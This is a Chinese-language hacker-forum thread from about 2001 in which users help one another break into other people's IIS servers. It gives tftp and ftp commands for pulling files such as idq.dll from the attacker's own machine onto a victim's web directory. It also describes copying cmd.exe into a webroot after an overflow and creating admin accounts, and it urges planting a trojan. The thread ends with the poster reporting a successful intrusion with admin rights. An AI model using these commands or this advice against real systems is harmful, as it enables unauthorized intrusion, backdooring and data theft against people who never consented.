20CN网络安全小组第一代论坛
发表新主题  发表回复

个人资料 | 社区目录 用户登录 | | 论坛搜索 | 常见问题 | 论坛主页
  下一个最老的主题   下一个最新的主题
» 20CN网络安全小组第一代论坛   » 安 全 基 地   » 黑客基地   » IIS难题

   
作者 标题: IIS难题
quake
未注册


图标 1  发表于         编辑/删除帖子   引用原文回复  
我用流光的IIS 远程执行: Remote Execute-E,dir是行的,但我上传idq.dll失败。我已经开了tftpd32.exe,设好了路径,也知道对方的主页路径。在IIS 远程执行: Remote Execute-E运行
tftp -i *.*.*.* idq.dll c://inetpub//scripts//idq.dll
文件没传上去。
还有,这个自己的ip是动态分配的ip,还是局域网的ip?(我们有2台机子上网,我是挂在另一台上的。)
IP: 已记录
quake
未注册


图标 1  发表于         编辑/删除帖子   引用原文回复  
不好意思,打错字了!
我用流光的IIS 远程执行: Remote Execute-E,dir是行的,但我上传idq.dll失败。我已经开了tftpd32.exe,设好了路径,也知道对方的虚拟路径(为c:\inetpub\scripts)。在I IS 远程执行: Remote Execute-E运行
tftp -i *.*.*.* idq.dll c:\\inetpub\\scripts\\idq.dll
文件没传上去。
还有,这个自己的ip是动态分配的ip,还是局域网的ip?(我们有2台机子上网,我是挂在另一台上的。)
IP: 已记录
§溶
未注册


图标 1  发表于         编辑/删除帖子   引用原文回复  
被上传文件应该放在TFTP的目录里,要不在IDQ.DLL前加上文件所在路径也行,你用的可能是共享上网,你可以在拨号的那台机器上运行WINI PCFG,把MODEM绑定,就可是看到真的IP了,上传的时候就用拨号时的IP
IP: 已记录
quake
未注册


图标 1  发表于         编辑/删除帖子   引用原文回复  
我已经把idq.dll放在tftpd32目录下,在tftpd32.exe中也把路径设定为idq.dll所在的目录。
我用的是共享上网,而且我用qq的显示好友补丁已经显示我的ip,也就是主机的ip(她的qq号码是我的好友,所以显示的ip也就是我的ip,因为我们是共享的嘛!) 。
望您老再指点指点!虚心学习,万分感谢!
IP: 已记录
§溶
未注册


图标 1  发表于         编辑/删除帖子   引用原文回复  
tftp -i *.*.*.* idq.dll c:\\inetpub\\scripts\\idq.dll
仔细找找还有什么地方错了?好象还缺什么参数吧
IP: 已记录
没影
未注册


图标 12  发表于         编辑/删除帖子   引用原文回复  
tftp -i *.*.*.* get idq.dllc:\\inetpub\\scripts\\idq.dll
IP: 已记录
§溶
未注册


图标 1  发表于         编辑/删除帖子   引用原文回复  
没影兄弟,你那篇求助帖子可能由于CGI故障,现在打开的是空白页面,看不到你的回复,望见晾!
IP: 已记录
没影
未注册


图标 9  发表于         编辑/删除帖子   引用原文回复  
又碰到一个难题:

利用溢出进入肉鸡winnt\system32目录成功
建立超级用户成功
建立ipc$连接失败
利用tftp失败(提示tftp不是内部或外部命令)
复制cmd.exe to c;\inetpub\wwwroot成功
IE调用cmd.exe成功

现在除了下载sam和修改主页外还能上传文件吗???

IP: 已记录
§溶
未注册


图标 1  发表于         编辑/删除帖子   引用原文回复  
你是不是通过溢出后舰艇一个端口得到ADMIN的?如果是那样的话就想办法看FTP能不能用,远程用FTP看能不能从你本机IP下载文件,FTP> ;GET YOUIP FILE.前提是本机开了F TP服务,如果这也不行,那么可能是真的有了防火墙,而且安全策略文件还是混合型的.如果能用FTP登陆到本地机并上传下载文件,别心软,找H IV给他放个木马

[ 11-09-2001: 贴子编辑者: §溶 ]

IP: 已记录
quake
未注册


图标 1  发表于         编辑/删除帖子   引用原文回复  
感谢各位大虾的指点,不过好象问题还是没解决,命令
tftp -i *.*.*.* get idq.dllc:\\inetpub\\scripts\\idq.dll
也打过了,还是失败。
IP: 已记录
§溶
未注册


图标 1  发表于         编辑/删除帖子   引用原文回复  
TFTP上传失败是常事,试试别的方法,比如用木马类的东西
IP: 已记录
japleak
未注册


图标 1  发表于         编辑/删除帖子   引用原文回复  
主要看你上网的机子了,应该是直接接入的机子,而不是通过共享internet的那台机子。
而且也不能上传过大的文件,我曾经就只能上传主页,但不能上传srv.exe文件!也许是通过设置吧?反正我还没有完全成功!
而且还要必须有唯一的ip,这对于拨号用户绝对适用!
IP: 已记录
quake
未注册


图标 10  发表于         编辑/删除帖子   引用原文回复  
感谢各位高手的指点。我直接拨号上网,不用共享,成功入侵。并用isap得到admin权限!^_^
IP: 已记录

 
发表新主题  发表回复 关闭主题 突出主题 移动主题 删除主题 下一个最老的主题   下一个最新的主题
 - 适于打印的主题视图
转到:
联系我们 | 20CN网络安全小组

Powered by Infopop Corporation
UBB.classic™ 6.5.0
NetDemon修改版 1.5.0, 20CN网络安全小组 版权所有。